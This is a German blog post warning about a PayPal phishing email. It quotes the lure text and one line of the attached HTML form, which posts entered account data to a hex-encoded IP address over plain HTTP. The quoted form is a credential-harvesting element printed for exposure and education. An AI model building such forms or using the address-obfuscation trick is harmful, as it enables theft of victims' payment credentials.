Das ist ja ein gnadenlos doofer Betreff! Gehts noch?!

To make sure everything is in order, please download the PayPal Security Account Verification and fill in all the required data for verfication.

Und dazu gibt es eine gnadenlos doofe Nachricht. Ohne Anrede, ohne Gruß, ohne alles, was auch nur entfernt nach glaubwürdiger Kommunikation von PayPal aussieht – stattdessen mit der Aufforderung, sich eine Kontobestätigung zur Sicherheit „runterzuladen“. Nun, dass dazu kein Link steht, ist gut verständlich, denn da ist noch etwas an die Mail angehängt. Dieser Spammer ist mit seinem Phishing-Versuch so brettmorsch hirnfraßmäßig doof, dass er nicht einmal den Unterschied zwischen einem Anhang und einem Link zum Download kennt. Leider hält ihn das nicht davon ab, ein paar Millionen Drecksspams durch das Netz zu bewegen.

Ach ja, das angehängte Dokument ist eine HTML-Datei mit dem schönen Namen PayPal Security Account Verification.html. Wer darauf klickt (so etwas macht man nur mit einem besonders gesicherten System), darf sich über den folgenden Anblick freuen:

[Wer sich darüber wundert: Die Titelgrafik wird aus dem Internet von PayPal nachgeladen, aber der System, mit dem ich solche Drecksdateien betrachte, hat keine Verbindung zum Internet. Deshalb fehlt die Grafik im Titelbereich.]

Aber es glaube bitte niemand, dass die eventuell dort eingegebenen Daten zu PayPal gehen, nein, sie gehen [es folgt ein Quelltextausschnitt]…

<FORM METHOD="POST" ACTION="http://0xD5.0xC3.0xDF.0xA9/paypalverification.php/" name="Form_1">

…an ein Skript auf einen Rechner mit der IP-Adresse 213.195.223.169; und der Spammer will diesen Fakt recht fragwürdig hinter einer eher unüblichen sedezimalen Schreibweise verbergen. Im Gegensatz zu PayPal hält dieser stümpernde Verbrecher auch nichts von einer sicheren Verbindung über HTTPS.

Oder anders gesagt: Wer in einer Mail „von PayPal“ einen Anhang „zum Ausfüllen“ findet, sollte sich bitte hüten, wenn er nicht eine Verbrecherbande reich machen will.

Und ja, wenn PayPal wirklich einmal schreibt, denn immer mit einer persönlichen Anrede, aber dafür ohne…

We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address and we have reasons to believe that your account was hijacked by a third party without your authorization. If you recently accessed your account while traveling, the unusual log in attempts may have been initiated by you.

…irgendwelche hingeschmierten Schwammigkeiten, die nichts belastbares aussagen, aber damit ordentlich Alarmstimmung beim Empfänger auslösen sollen.